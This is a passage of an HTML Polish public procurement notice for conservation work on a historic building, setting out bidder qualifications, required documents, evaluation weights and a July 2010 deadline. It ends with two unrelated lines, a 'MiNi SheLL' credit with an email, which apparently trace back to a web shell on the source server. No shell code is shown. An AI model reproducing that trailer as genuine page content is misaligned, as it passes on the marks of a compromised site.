* co najmniej jeden dyplomowany konstruktor z uprawnieniami dot. konstrukcji obiektów zabytkowych oraz z minimum 10-letnią doświadczeniem przy konstrukcji budowli zabytkowych, który odbył po uzyskaniu dyplomu co najmniej 12 miesięczną praktykę w konserwacji tych zabytków. (Rozporządzenie Ministra Kultury z dn. 9 czerwca 2004 r, w sprawie prowadzenia prac konserwatorskich, restauratorskich, robot budowlanych, badań konserwatorskich i architektonicznych, a także innych działań przy zabytku wpisanym do rejestru zabytków oraz badań archeologicznych i poszukiwań ukrytych lub porzuconych zabytków ruchomych. Dz. U.2004.150.1579.)</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>4) znajdują się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia. Wykonawca musi spełniać następujące warunki: 
4.1. wykazać średnie roczne przychody netto ze sprzedaży w wysokości nie mniejszej niż    130 000 złotych w okresie ostatnich 3 lat obrotowych (tj. lat 2007, 2008, 2009), a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">koncesję, zezwolenie lub licencję</li>

<li  style="margin-bottom: 12px;">wykaz robót budowlanych w zakresie niezbędnym do wykazania spełniania warunku  wiedzy i doświadczenia, wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz załączeniem dokumentu potwierdzającego, że roboty zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone</li>

<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">oświadczenie na temat wielkości średniego rocznego zatrudnienia u wykonawcy usług lub robót budowlanych oraz liczebności personelu kierowniczego w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a w przypadku gdy okres prowadzenia działalności jest krótszy - w tym okresie</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

<li  style="margin-bottom: 12px;">sprawozdanie finansowe w części, a jeżeli podlega ono badaniu przez biegłego rewidenta zgodnie z przepisami o rachunkowości również z opinią odpowiednio o badanym sprawozdaniu albo jego części, a w przypadku wykonawców niezobowiązanych do sporządzania sprawozdania finansowego inny dokument określający obroty oraz zobowiązania i należności - za okres nie dłuższy niż ostatnie 3 lata obrotowe</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li style="margin-right: 20px;"><p class="justify"><span class="bold">III.4.3.2)</span> zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert - albo oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio miejsca zamieszkania osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, jeżeli w miejscu zamieszkania osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się takiego zaświadczenia</p></li></ul>

<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg ograniczony.</p>
<p><b>IV.1.2) Przewidywana liczba wykonawców, którzy zostaną zaproszeni do udziału w postępowaniu:</b> 5.</p>
<p class="bold">Znaczenie warunków wyboru wykonawców, którzy zostaną zaproszeni do udziału w postępowaniu</p>
<p>Ocena spełnienia warunków udziału w postępowaniu zostanie dokonana wg formuły spełnia/nie spełnia, w oparciu o informacje (i ich weryfikację) zawarte w załączonych do wniosku dokumentach i oświadczeniach. Z treści tych dokumentów musi jednoznacznie wynikać, że wykonawca spełnia wszystkie warunki. Jeżeli liczba wykonawców, którzy spełniają warunki udziału w postępowaniu będzie mniejsza niż 5, zamawiający zaprosi do składania ofert wszystkich wykonawców spełniających te warunki. W przypadku, gdy liczba wykonawców, którzy spełniają warunki udziału w postępowaniu będzie większa niż 5, zamawiający zastosuje dodatkową kwalifikację polegająca na przyznaniu wykonawcom po 1 pkt za każde dodatkowo wykonane ponad minimum kwalifikacyjne zamówienie polegające na wykonaniu robót wymienionych powyżej w pkt 3 [Grupy: I -V maksymalnie po 5 pkt w każdej z grup] potwierdzone dokumentami świadczącymi o należytym wykonaniu wskazanego zamówienia i zaprosi do składania ofert wykonawców, którzy otrzymają największą ilość punktów podczas dodatkowej kwalifikacji.</p>
<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p><ul class="kh_indent_1">
<li>1 - Cena - 45</li>
<li>2 - Szczegółowy program prac konserwatorskich - 40</li>
<li>3 - Zaoferowanie danej techniki konserwacji (oznaczonej w SIWZ) - 15</li>
</ul>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>nie</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.scheibler.org.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> www.scheibler.org.pl.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 30.07.2010 godzina 08:00, miejsce: siedziba Zamawiającego.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Przedmiotowy wniosek należy złożyć w siedzibie Zamawiającego w terminie określonym w niniejszym ogłoszeniu, w zamkniętej kopercie zaadresowanej na adres Zamawiającego jak w sekcji I i oznaczonej: Wniosek o dopuszczenie do udziału w postępowaniu - Nr sprawy: ZP-01/2010 oraz nazwą Wykonawcy. Wniosek winien zawierać w szczególności:
 
1. Oznaczenie podmiotów składających wniosek (nazwa, siedziba, telefon, fax, e-mail, NIP, Regon); 
2. Oświadczenie o spełnianiu warunków udziału w postępowaniu określonych w art. 22 ust.1 ustawy Prawo zamówień publicznych i niniejszym ogłoszeniu;
3. Oświadczenie o braku podstaw do wykluczenia wnioskodawcy na podstawie art. 24 ust. 1 ustawy Prawo zamówień publicznych;
4. Załączniki (dokumenty żądane zgodnie z niniejszym ogłoszeniem).

Wykonawcy ubiegający się wspólnie o udzielenie zamówienia do wniosku załączają pełnomocnictwo do reprezentowania wykonawców w trakcie postępowania (pełnomocnictwo może także obejmować uprawnienie do zawarcia umowy). Pełnomocnictwo musi być przedstawione w formie oryginału lub kopii poświadczonej notarialnie za zgodność z oryginałem. Pełnomocnictwo podpisują wszyscy wykonawcy ubiegający się wspólnie o udzielenie zamówienia. Pełnomocnik podpisuje wniosek o dopuszczenie do udziału w postępowaniu i załączone do niego dokumenty. Wszelka korespondencja prowadzona będzie wyłącznie z Pełnomocnikiem.

W przypadku podpisania wniosku o dopuszczenie do udziału w postępowaniu, oświadczeń lub innych dokumentów, a także poświadczenia za zgodność z oryginałem kopii dokumentów, przez osobę niewymienioną w dokumencie rejestracyjnym, do wniosku należy dołączyć pełnomocnictwo dla tej osoby. Pełnomocnictwo musi być przedstawione w formie oryginału lub kopii poświadczonej notarialnie za zgodność z oryginałem. 

Podpisanie wniosku i poświadczenia za zgodność z oryginałem winny być sporządzone w sposób umożliwiający identyfikację podpisu (np. czytelny podpis lub parafa wraz z imienną pieczątką osoby podpisującej dokument lub poświadczającej kopię). 

W przypadku złożenia kopii dokumentu w formie nieczytelnej lub budzącej wątpliwości, co do jej prawdziwości, zamawiający wezwie wykonawcę do przedstawienia w wyznaczonym terminie oryginału dokumentu lub jego notarialnie poświadczonej kopii.

Wszelkie poprawki lub zmiany w tekście wniosku muszą być parafowane i datowane własnoręcznie przez osobę podpisującą wniosek. 

Wszystkie strony wniosku zawierające jego treść winny być ponumerowane. 

Projekt nie jest finansowany ze środków Unii Europejskiej..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com